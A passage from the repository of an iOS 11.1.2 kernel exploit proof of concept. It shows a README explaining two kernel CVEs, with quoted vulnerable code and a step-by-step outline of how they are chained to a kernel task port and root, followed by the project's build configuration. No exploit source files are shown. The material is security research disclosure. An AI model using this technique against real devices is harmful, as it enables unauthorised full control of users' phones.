├── .gitignore ├── README ├── async_wake_ios.xcodeproj └── project.pbxproj └── async_wake_ios ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets └── AppIcon.appiconset │ └── Contents.json ├── Base.lproj ├── LaunchScreen.storyboard └── Main.storyboard ├── Info.plist ├── ViewController.h ├── ViewController.m ├── arm64_state.h ├── async_wake.c ├── async_wake.h ├── com.apple.iokit.IOMobileGraphicsFamily.plist ├── early_kalloc.c ├── early_kalloc.h ├── find_port.c ├── find_port.h ├── kcall.c ├── kcall.h ├── kdbg.c ├── kdbg.h ├── kmem.c ├── kmem.h ├── kutils.c ├── kutils.h ├── main.m ├── symbols.c └── symbols.h /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.gitignore.io/api/macos,xcode 2 | 3 | ### macOS ### 4 | *.DS_Store 5 | .AppleDouble 6 | .LSOverride 7 | 8 | # Icon must end with two \r 9 | Icon 10 | 11 | # Thumbnails 12 | ._* 13 | 14 | # Files that might appear in the root of a volume 15 | .DocumentRevisions-V100 16 | .fseventsd 17 | .Spotlight-V100 18 | .TemporaryItems 19 | .Trashes 20 | .VolumeIcon.icns 21 | .com.apple.timemachine.donotpresent 22 | 23 | # Directories potentially created on remote AFP share 24 | .AppleDB 25 | .AppleDesktop 26 | Network Trash Folder 27 | Temporary Items 28 | .apdisk 29 | 30 | ### Xcode ### 31 | # Xcode 32 | # 33 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 34 | 35 | ## Build generated 36 | build/ 37 | DerivedData/ 38 | 39 | ## Various settings 40 | *.pbxuser 41 | !default.pbxuser 42 | *.mode1v3 43 | !default.mode1v3 44 | *.mode2v3 45 | !default.mode2v3 46 | *.perspectivev3 47 | !default.perspectivev3 48 | xcuserdata/ 49 | 50 | ## Other 51 | *.moved-aside 52 | *.xccheckout 53 | *.xcscmblueprint 54 | 55 | ### Xcode Patch ### 56 | *.xcodeproj/* 57 | !*.xcodeproj/project.pbxproj 58 | !*.xcodeproj/xcshareddata/ 59 | !*.xcworkspace/contents.xcworkspacedata 60 | /*.gcno 61 | 62 | # End of https://www.gitignore.io/api/macos,xcode 63 | 64 | async_wake_ios.xcodeproj/project.pbxproj 65 | async_wake_ios.xcodeproj/project.pbxproj 66 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | async_wake - iOS 11.1.2 kernel exploit and PoC local kernel debugger by @i41nbeer 2 | 3 | Supported Devices: 4 | tfp0: all 64-bit devices running 11.1.2 5 | 6 | tfp0 + local kernel debugger: iPhone 10, iPhone 7, iPhone 7 plus, iPhone 6S, iPhone 6 plus, iPod Touch 6G, iPad Mini 2 WiFi, iPhone 5S 7 | theoretically it will also work for all other devices, you just need to find the symbols 8 | 9 | root: all 64-bit devices running 11.1.2 10 | 11 | We can now temporarily gain uid=0! I think we have to swap back to the old uid to prevent kernel panics though. 12 | 13 | Usage: 14 | - call get_root() and store the cred (orig_cred) it returns. 15 | - do root stuff 16 | - unroot(orig_cred) 17 | 18 | PoC local kernel debugger: 19 | You can pause the execution of a syscall at arbitrary points and modify kernel state (registers and memory) then continue it. 20 | See kdbg.c for details and implementation. 21 | 22 | The bugs: 23 | 24 | === CVE-2017-13861 === 25 | [https://bugs.chromium.org/p/project-zero/issues/detail?id=1417] 26 | 27 | I have previously detailed the lifetime management paradigms in MIG in the writeups for: 28 | CVE-2016-7612 [https://bugs.chromium.org/p/project-zero/issues/detail?id=926] 29 | and 30 | CVE-2016-7633 [https://bugs.chromium.org/p/project-zero/issues/detail?id=954] 31 | 32 | If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it. 33 | If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it. 34 | 35 | If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference 36 | on that mach port passed to the external method will be managed by MIG semantics. If the external method returns 37 | an error then MIG will assume that the reference was not consumed by the external method and as such the MIG 38 | generated coode will drop a reference on the port. 39 | 40 | IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port 41 | (via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered 42 | a port with the same callback function. 43 | 44 | The external method's error return value propagates via the return value of is_io_connect_async_method back to the 45 | MIG generated code which will drop a futher reference on the wake_port when only one was taken. 46 | 47 | I also use another bug: 48 | 49 | === CVE-2017-13865 === 50 | [https://bugs.chromium.org/p/project-zero/issues/detail?id=1372] 51 | the kernel libproc API proc_list_uptrs has the following comment in it's userspace header: 52 | 53 | /* 54 | * Enumerate potential userspace pointers embedded in kernel data structures. 55 | * Currently inspects kqueues only. 56 | * 57 | * NOTE: returned "pointers" are opaque user-supplied values and thus not 58 | * guaranteed to address valid objects or be pointers at all. 59 | * 60 | * Returns the number of pointers found (which may exceed buffersize), or -1 on 61 | * failure and errno set appropriately. 62 | */ 63 | 64 | This is a recent addition to the kernel, presumably as a debugging tool to help enumerate 65 | places where the kernel is accidentally disclosing pointers to userspace. 66 | 67 | The implementation currently enumerates kqueues and dumps a bunch of values from them. 68 | 69 | Here's the relevant code: 70 | 71 | // buffer and buffersize are attacker controlled 72 | 73 | int 74 | proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval) 75 | { 76 | uint32_t count = 0; 77 | int error = 0; 78 | void *kbuf = NULL; 79 | int32_t nuptrs = 0; 80 | 81 | if (buffer != USER_ADDR_NULL) { 82 | count = buffersize / sizeof(uint64_t); <---(a) 83 | if (count > MAX_UPTRS) { 84 | count = MAX_UPTRS; 85 | buffersize = count * sizeof(uint64_t); 86 | } 87 | if (count > 0) { 88 | kbuf = kalloc(buffersize); <--- (b) 89 | assert(kbuf != NULL); 90 | } 91 | } else { 92 | buffersize = 0; 93 | } 94 | 95 | nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize); 96 | 97 | if (kbuf) { 98 | size_t copysize; 99 | if (os_mul_overflow(nuptrs, sizeof(uint64_t), ©size)) { <--- (c) 100 | error = ERANGE; 101 | goto out; 102 | } 103 | if (copysize > buffersize) { <-- (d) 104 | copysize = buffersize; 105 | } 106 | error = copyout(kbuf, buffer, copysize); <--- (e) 107 | } 108 | 109 | 110 | At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's 111 | which can fit in there. 112 | 113 | If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b). 114 | 115 | kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of 116 | kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger 117 | than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf. 118 | 119 | This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf 120 | but how many *could* have been written had the buffer been big enough. 121 | 122 | If there were possible values which could have been written than there was space in the buffer then at (d) copysize 123 | will be limited down to buffersize. 124 | 125 | Copysize is then used at (e) to copy the contents of kbuf to userspace. 126 | 127 | The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1 128 | as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes. 129 | 130 | If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will 131 | only write to the first value to kbuf, leaving the last 7 bytes untouched. 132 | 133 | At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15) 134 | and at (e) 15 bytes will be copied back to userspace even though only 8 were written to. 135 | 136 | 137 | Exploit technique: 138 | I use the proc_pidlistuptrs bug to disclose the address of arbitrary ipc_ports. This makes stuff a lot simpler :) 139 | To find a port address I fill a bunch of different-sized kalloc allocations with a pointer to the target port via mach messages using OOL_PORTS. 140 | 141 | I then trigger the OOB read bug for various kalloc sizes and look for the most commonly leaked kernel pointer. Given the 142 | semantics of kalloc this works well. 143 | 144 | I make a pretty large number of kalloc allocations (via sending mach messages) in a kalloc size bin I won't use later, and I keep hold of them for now. 145 | 146 | I allocate a bunch of mach ports to ensure that I have a page containing only my ports. I use the port address disclosure to find 147 | a port which fits within particular bounds on a page. Once I've found it, I use the IOSurface bug to give myself a dangling pointer to that port. 148 | 149 | I free the kalloc allocations made earlier and all the other ports then start making kalloc.4096 allocations (again via crafted mach messages.) 150 | 151 | I do the reallocation slowly, 1MB at a time so that a kernel zone garbage collection will trigger and collect the page that the dangling pointer points to. 152 | 153 | The GC will trigger when the zone map is over 95% full. It's easy to do that, the trick is to make sure there's plenty of stuff which the GC can collect 154 | so that you don't get immediately killed by jetsam. All devices have the same sized zone map (384MB). 155 | 156 | The replacement kalloc.4096 allocations are ipc_kmsg buffers which contain a fake IKOT_TASK port pointing to a fake struct task. 157 | I use the bsdinfo->pid trick to build an arbitrary read with this (see details in async_wake.c.) 158 | 159 | With the arbitrary read I find the kernel task's vm_map and the kernel ipc_space. I then free and reallocate the kalloc.4096 buffer replacing it with a fake 160 | kernel task port. 161 | 162 | Limitations: 163 | The technique should work reliably enough for a security research tool. For me it works about 9/10 times. If you run it multiple times without rebooting, 164 | it will probably panic, the GC forcing and reallocating trick isn't particularly advanced. 165 | 166 | It's more likely to work after a fresh reboot. 167 | 168 | The tfp0 returned by get_kernel_memory_rw should be safe to keep using after the exploit process has exited, but I haven't tested that. 169 | 170 | Porting to other devices: 171 | 172 | Getting tfp0 should work for all devices running 11.1.2, it only requires structure offsets, not kernel symbols, which are unlikely to change between devices. 173 | To port the PoC kernel debugger you need to find the correct symbols and update symbols.c, hints are given there. 174 | 175 | For further discussion of this bug and other exploit techniques see: 176 | http://blog.pangu.io/iosurfacerootuserclient-port-uaf/ 177 | https://siguza.github.io/v0rtex/ 178 | -------------------------------------------------------------------------------- /async_wake_ios.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 48; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 53F39D541FE1F28C00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist in Resources */ = {isa = PBXBuildFile; fileRef = 53F39D531FE1F28B00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist */; }; 11 | B003EB351FC583CB00C58441 /* kmem.c in Sources */ = {isa = PBXBuildFile; fileRef = B003EB331FC583CA00C58441 /* kmem.c */; }; 12 | B003EB381FC5863800C58441 /* find_port.c in Sources */ = {isa = PBXBuildFile; fileRef = B003EB361FC5863800C58441 /* find_port.c */; }; 13 | B003EB3B1FC58F4900C58441 /* kdbg.c in Sources */ = {isa = PBXBuildFile; fileRef = B003EB391FC58F4900C58441 /* kdbg.c */; }; 14 | B04E25091FCD6DB300F09CCE /* kutils.c in Sources */ = {isa = PBXBuildFile; fileRef = B04E25071FCD6DB300F09CCE /* kutils.c */; }; 15 | B07A023E1FB09B6F0018ACE5 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = B07A023D1FB09B6F0018ACE5 /* AppDelegate.m */; }; 16 | B07A02411FB09B6F0018ACE5 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = B07A02401FB09B6F0018ACE5 /* ViewController.m */; }; 17 | B07A02441FB09B6F0018ACE5 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B07A02421FB09B6F0018ACE5 /* Main.storyboard */; }; 18 | B07A02461FB09B6F0018ACE5 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = B07A02451FB09B6F0018ACE5 /* Assets.xcassets */; }; 19 | B07A02491FB09B6F0018ACE5 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B07A02471FB09B6F0018ACE5 /* LaunchScreen.storyboard */; }; 20 | B07A024C1FB09B6F0018ACE5 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = B07A024B1FB09B6F0018ACE5 /* main.m */; }; 21 | B07A02541FB09C3D0018ACE5 /* async_wake.c in Sources */ = {isa = PBXBuildFile; fileRef = B07A02521FB09C3D0018ACE5 /* async_wake.c */; }; 22 | B0EF11141FCC6F9C00C1D14E /* kcall.c in Sources */ = {isa = PBXBuildFile; fileRef = B0EF11121FCC6F9C00C1D14E /* kcall.c */; }; 23 | B0EF11171FCC784B00C1D14E /* symbols.c in Sources */ = {isa = PBXBuildFile; fileRef = B0EF11151FCC784B00C1D14E /* symbols.c */; }; 24 | B0F5AA3F1FDE87E90073FD88 /* early_kalloc.c in Sources */ = {isa = PBXBuildFile; fileRef = B0F5AA3D1FDE87E80073FD88 /* early_kalloc.c */; }; 25 | /* End PBXBuildFile section */ 26 | 27 | /* Begin PBXFileReference section */ 28 | 53F39D531FE1F28B00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = com.apple.iokit.IOMobileGraphicsFamily.plist; sourceTree = ""; }; 29 | B003EB331FC583CA00C58441 /* kmem.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kmem.c; sourceTree = ""; }; 30 | B003EB341FC583CA00C58441 /* kmem.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kmem.h; sourceTree = ""; }; 31 | B003EB361FC5863800C58441 /* find_port.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = find_port.c; sourceTree = ""; }; 32 | B003EB371FC5863800C58441 /* find_port.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = find_port.h; sourceTree = ""; }; 33 | B003EB391FC58F4900C58441 /* kdbg.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kdbg.c; sourceTree = ""; }; 34 | B003EB3A1FC58F4900C58441 /* kdbg.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kdbg.h; sourceTree = ""; }; 35 | B04E25071FCD6DB300F09CCE /* kutils.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kutils.c; sourceTree = ""; }; 36 | B04E25081FCD6DB300F09CCE /* kutils.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kutils.h; sourceTree = ""; }; 37 | B04E250A1FCF083A00F09CCE /* arm64_state.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = arm64_state.h; sourceTree = ""; }; 38 | B07A02391FB09B6F0018ACE5 /* async_wake_ios.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = async_wake_ios.app; sourceTree = BUILT_PRODUCTS_DIR; }; 39 | B07A023C1FB09B6F0018ACE5 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 40 | B07A023D1FB09B6F0018ACE5 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 41 | B07A023F1FB09B6F0018ACE5 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 42 | B07A02401FB09B6F0018ACE5 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 43 | B07A02431FB09B6F0018ACE5 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 44 | B07A02451FB09B6F0018ACE5 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 45 | B07A02481FB09B6F0018ACE5 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 46 | B07A024A1FB09B6F0018ACE5 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 47 | B07A024B1FB09B6F0018ACE5 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 48 | B07A02521FB09C3D0018ACE5 /* async_wake.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = async_wake.c; sourceTree = ""; }; 49 | B07A02531FB09C3D0018ACE5 /* async_wake.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = async_wake.h; sourceTree = ""; }; 50 | B0EF11121FCC6F9C00C1D14E /* kcall.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kcall.c; sourceTree = ""; }; 51 | B0EF11131FCC6F9C00C1D14E /* kcall.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kcall.h; sourceTree = ""; }; 52 | B0EF11151FCC784B00C1D14E /* symbols.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = symbols.c; sourceTree = ""; }; 53 | B0EF11161FCC784B00C1D14E /* symbols.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = symbols.h; sourceTree = ""; }; 54 | B0F5AA3D1FDE87E80073FD88 /* early_kalloc.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = early_kalloc.c; sourceTree = ""; }; 55 | B0F5AA3E1FDE87E80073FD88 /* early_kalloc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = early_kalloc.h; sourceTree = ""; }; 56 | /* End PBXFileReference section */ 57 | 58 | /* Begin PBXFrameworksBuildPhase section */ 59 | B07A02361FB09B6F0018ACE5 /* Frameworks */ = { 60 | isa = PBXFrameworksBuildPhase; 61 | buildActionMask = 2147483647; 62 | files = ( 63 | ); 64 | runOnlyForDeploymentPostprocessing = 0; 65 | }; 66 | /* End PBXFrameworksBuildPhase section */ 67 | 68 | /* Begin PBXGroup section */ 69 | B07A02301FB09B6F0018ACE5 = { 70 | isa = PBXGroup; 71 | children = ( 72 | B07A023B1FB09B6F0018ACE5 /* async_wake_ios */, 73 | B07A023A1FB09B6F0018ACE5 /* Products */, 74 | ); 75 | sourceTree = ""; 76 | }; 77 | B07A023A1FB09B6F0018ACE5 /* Products */ = { 78 | isa = PBXGroup; 79 | children = ( 80 | B07A02391FB09B6F0018ACE5 /* async_wake_ios.app */, 81 | ); 82 | name = Products; 83 | sourceTree = ""; 84 | }; 85 | B07A023B1FB09B6F0018ACE5 /* async_wake_ios */ = { 86 | isa = PBXGroup; 87 | children = ( 88 | 53F39D531FE1F28B00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist */, 89 | B07A023C1FB09B6F0018ACE5 /* AppDelegate.h */, 90 | B07A023D1FB09B6F0018ACE5 /* AppDelegate.m */, 91 | B07A023F1FB09B6F0018ACE5 /* ViewController.h */, 92 | B07A02401FB09B6F0018ACE5 /* ViewController.m */, 93 | B07A02421FB09B6F0018ACE5 /* Main.storyboard */, 94 | B07A02451FB09B6F0018ACE5 /* Assets.xcassets */, 95 | B07A02471FB09B6F0018ACE5 /* LaunchScreen.storyboard */, 96 | B07A024A1FB09B6F0018ACE5 /* Info.plist */, 97 | B07A024B1FB09B6F0018ACE5 /* main.m */, 98 | B07A02521FB09C3D0018ACE5 /* async_wake.c */, 99 | B07A02531FB09C3D0018ACE5 /* async_wake.h */, 100 | B003EB331FC583CA00C58441 /* kmem.c */, 101 | B003EB341FC583CA00C58441 /* kmem.h */, 102 | B04E250A1FCF083A00F09CCE /* arm64_state.h */, 103 | B003EB361FC5863800C58441 /* find_port.c */, 104 | B003EB371FC5863800C58441 /* find_port.h */, 105 | B003EB391FC58F4900C58441 /* kdbg.c */, 106 | B003EB3A1FC58F4900C58441 /* kdbg.h */, 107 | B0EF11151FCC784B00C1D14E /* symbols.c */, 108 | B0EF11161FCC784B00C1D14E /* symbols.h */, 109 | B0EF11121FCC6F9C00C1D14E /* kcall.c */, 110 | B0EF11131FCC6F9C00C1D14E /* kcall.h */, 111 | B04E25071FCD6DB300F09CCE /* kutils.c */, 112 | B04E25081FCD6DB300F09CCE /* kutils.h */, 113 | B0F5AA3D1FDE87E80073FD88 /* early_kalloc.c */, 114 | B0F5AA3E1FDE87E80073FD88 /* early_kalloc.h */, 115 | ); 116 | path = async_wake_ios; 117 | sourceTree = ""; 118 | }; 119 | /* End PBXGroup section */ 120 | 121 | /* Begin PBXNativeTarget section */ 122 | B07A02381FB09B6F0018ACE5 /* async_wake_ios */ = { 123 | isa = PBXNativeTarget; 124 | buildConfigurationList = B07A024F1FB09B6F0018ACE5 /* Build configuration list for PBXNativeTarget "async_wake_ios" */; 125 | buildPhases = ( 126 | B07A02351FB09B6F0018ACE5 /* Sources */, 127 | B07A02361FB09B6F0018ACE5 /* Frameworks */, 128 | B07A02371FB09B6F0018ACE5 /* Resources */, 129 | ); 130 | buildRules = ( 131 | ); 132 | dependencies = ( 133 | ); 134 | name = async_wake_ios; 135 | productName = async_wake_ios; 136 | productReference = B07A02391FB09B6F0018ACE5 /* async_wake_ios.app */; 137 | productType = "com.apple.product-type.application"; 138 | }; 139 | /* End PBXNativeTarget section */ 140 | 141 | /* Begin PBXProject section */ 142 | B07A02311FB09B6F0018ACE5 /* Project object */ = { 143 | isa = PBXProject; 144 | attributes = { 145 | LastUpgradeCheck = 0910; 146 | ORGANIZATIONNAME = "Ian Beer"; 147 | TargetAttributes = { 148 | B07A02381FB09B6F0018ACE5 = { 149 | CreatedOnToolsVersion = 9.1; 150 | ProvisioningStyle = Automatic; 151 | }; 152 | }; 153 | }; 154 | buildConfigurationList = B07A02341FB09B6F0018ACE5 /* Build configuration list for PBXProject "async_wake_ios" */; 155 | compatibilityVersion = "Xcode 8.0"; 156 | developmentRegion = en; 157 | hasScannedForEncodings = 0; 158 | knownRegions = ( 159 | en, 160 | Base, 161 | ); 162 | mainGroup = B07A02301FB09B6F0018ACE5; 163 | productRefGroup = B07A023A1FB09B6F0018ACE5 /* Products */; 164 | projectDirPath = ""; 165 | projectRoot = ""; 166 | targets = ( 167 | B07A02381FB09B6F0018ACE5 /* async_wake_ios */, 168 | ); 169 | }; 170 | /* End PBXProject section */ 171 | 172 | /* Begin PBXResourcesBuildPhase section */ 173 | B07A02371FB09B6F0018ACE5 /* Resources */ = { 174 | isa = PBXResourcesBuildPhase; 175 | buildActionMask = 2147483647; 176 | files = ( 177 | B07A02491FB09B6F0018ACE5 /* LaunchScreen.storyboard in Resources */, 178 | B07A02461FB09B6F0018ACE5 /* Assets.xcassets in Resources */, 179 | B07A02441FB09B6F0018ACE5 /* Main.storyboard in Resources */, 180 | 53F39D541FE1F28C00CD8539 /* com.apple.iokit.IOMobileGraphicsFamily.plist in Resources */, 181 | ); 182 | runOnlyForDeploymentPostprocessing = 0; 183 | }; 184 | /* End PBXResourcesBuildPhase section */ 185 | 186 | /* Begin PBXSourcesBuildPhase section */ 187 | B07A02351FB09B6F0018ACE5 /* Sources */ = { 188 | isa = PBXSourcesBuildPhase; 189 | buildActionMask = 2147483647; 190 | files = ( 191 | B003EB351FC583CB00C58441 /* kmem.c in Sources */, 192 | B0EF11171FCC784B00C1D14E /* symbols.c in Sources */, 193 | B07A02411FB09B6F0018ACE5 /* ViewController.m in Sources */, 194 | B04E25091FCD6DB300F09CCE /* kutils.c in Sources */, 195 | B07A024C1FB09B6F0018ACE5 /* main.m in Sources */, 196 | B003EB381FC5863800C58441 /* find_port.c in Sources */, 197 | B07A02541FB09C3D0018ACE5 /* async_wake.c in Sources */, 198 | B07A023E1FB09B6F0018ACE5 /* AppDelegate.m in Sources */, 199 | B003EB3B1FC58F4900C58441 /* kdbg.c in Sources */, 200 | B0EF11141FCC6F9C00C1D14E /* kcall.c in Sources */, 201 | B0F5AA3F1FDE87E90073FD88 /* early_kalloc.c in Sources */, 202 | ); 203 | runOnlyForDeploymentPostprocessing = 0; 204 | }; 205 | /* End PBXSourcesBuildPhase section */ 206 | 207 | /* Begin PBXVariantGroup section */ 208 | B07A02421FB09B6F0018ACE5 /* Main.storyboard */ = { 209 | isa = PBXVariantGroup; 210 | children = ( 211 | B07A02431FB09B6F0018ACE5 /* Base */, 212 | ); 213 | name = Main.storyboard; 214 | sourceTree = ""; 215 | }; 216 | B07A02471FB09B6F0018ACE5 /* LaunchScreen.storyboard */ = { 217 | isa = PBXVariantGroup; 218 | children = ( 219 | B07A02481FB09B6F0018ACE5 /* Base */, 220 | ); 221 | name = LaunchScreen.storyboard; 222 | sourceTree = ""; 223 | }; 224 | /* End PBXVariantGroup section */ 225 | 226 | /* Begin XCBuildConfiguration section */ 227 | B07A024D1FB09B6F0018ACE5 /* Debug */ = { 228 | isa = XCBuildConfiguration; 229 | buildSettings = { 230 | ALWAYS_SEARCH_USER_PATHS = NO; 231 | CLANG_ANALYZER_NONNULL = YES; 232 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 233 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 234 | CLANG_CXX_LIBRARY = "libc++"; 235 | CLANG_ENABLE_MODULES = YES; 236 | CLANG_ENABLE_OBJC_ARC = YES; 237 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 238 | CLANG_WARN_BOOL_CONVERSION = YES; 239 | CLANG_WARN_COMMA = YES; 240 | CLANG_WARN_CONSTANT_CONVERSION = YES; 241 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 242 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 243 | CLANG_WARN_EMPTY_BODY = YES; 244 | CLANG_WARN_ENUM_CONVERSION = YES; 245 | CLANG_WARN_INFINITE_RECURSION = YES; 246 | CLANG_WARN_INT_CONVERSION = YES; 247 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 248 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 249 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 250 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 251 | CLANG_WARN_STRICT_PROTOTYPES = YES; 252 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 253 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 254 | CLANG_WARN_UNREACHABLE_CODE = YES; 255 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 256 | CODE_SIGN_IDENTITY = "iPhone Developer"; 257 | COPY_PHASE_STRIP = NO; 258 | DEBUG_INFORMATION_FORMAT = dwarf; 259 | ENABLE_STRICT_OBJC_MSGSEND = YES; 260 | ENABLE_TESTABILITY = YES; 261 | GCC_C_LANGUAGE_STANDARD = gnu11; 262 | GCC_DYNAMIC_NO_PIC = NO; 263 | GCC_NO_COMMON_BLOCKS = YES; 264 | GCC_OPTIMIZATION_LEVEL = 0; 265 | GCC_PREPROCESSOR_DEFINITIONS = ( 266 | "DEBUG=1", 267 | "$(inherited)", 268 | ); 269 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 270 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 271 | GCC_WARN_UNDECLARED_SELECTOR = YES; 272 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 273 | GCC_WARN_UNUSED_FUNCTION = YES; 274 | GCC_WARN_UNUSED_VARIABLE = YES; 275 | IPHONEOS_DEPLOYMENT_TARGET = 11.1; 276 | MTL_ENABLE_DEBUG_INFO = YES; 277 | ONLY_ACTIVE_ARCH = YES; 278 | SDKROOT = iphoneos; 279 | }; 280 | name = Debug; 281 | }; 282 | B07A024E1FB09B6F0018ACE5 /* Release */ = { 283 | isa = XCBuildConfiguration; 284 | buildSettings = { 285 | ALWAYS_SEARCH_USER_PATHS = NO; 286 | CLANG_ANALYZER_NONNULL = YES; 287 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 288 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 289 | CLANG_CXX_LIBRARY = "libc++"; 290 | CLANG_ENABLE_MODULES = YES; 291 | CLANG_ENABLE_OBJC_ARC = YES; 292 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 293 | CLANG_WARN_BOOL_CONVERSION = YES; 294 | CLANG_WARN_COMMA = YES; 295 | CLANG_WARN_CONSTANT_CONVERSION = YES; 296 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 297 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 298 | CLANG_WARN_EMPTY_BODY = YES; 299 | CLANG_WARN_ENUM_CONVERSION = YES; 300 | CLANG_WARN_INFINITE_RECURSION = YES; 301 | CLANG_WARN_INT_CONVERSION = YES; 302 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 303 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 304 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 305 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 306 | CLANG_WARN_STRICT_PROTOTYPES = YES; 307 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 308 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 309 | CLANG_WARN_UNREACHABLE_CODE = YES; 310 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 311 | CODE_SIGN_IDENTITY = "iPhone Developer"; 312 | COPY_PHASE_STRIP = NO; 313 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 314 | ENABLE_NS_ASSERTIONS = NO; 315 | ENABLE_STRICT_OBJC_MSGSEND = YES; 316 | GCC_C_LANGUAGE_STANDARD = gnu11; 317 | GCC_NO_COMMON_BLOCKS = YES; 318 | 